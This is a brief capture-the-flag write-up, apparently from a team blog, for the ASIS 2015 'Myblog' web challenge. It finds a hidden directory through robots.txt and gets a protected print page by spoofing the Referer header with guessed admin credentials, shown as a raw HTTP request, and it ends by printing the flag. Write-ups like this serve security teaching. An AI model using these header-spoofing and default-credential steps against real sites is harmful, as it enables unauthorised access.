ASIS 2015 Finals: Myblog (web150)

Reading time ~1 minute

This challenge was solved by and the write up was written by one of my teammates, nguyen

http://myblog.asis-ctf.ir:8088/robots.txt

User-agent: *
Disallow: /myblog_private_dir3ct0ry

From printing feature you can see the page by sending the correct referer header. Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/

GET /printpage.php?id=2417648298 HTTP/1.1
Host: myblog.asis-ctf.ir:8088
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&password=admin
Connection: keep-alive

After some combinations of commons params name I decided to send them all

Referer: http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&password=admin&login=admin&user=admin

And I got this pdf has flag:

ASIS{9c846eab5200c267cb593437780caa4d}

HITCON CTF 2019 Quals: Reverse - EmojiVM

This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading

HITCON CTF 2019 Quals: Reverse - CoreDumb

Published on October 19, 2019

HITCON CTF 2019 Quals: Pwn - Crypto in the shell

Published on October 19, 2019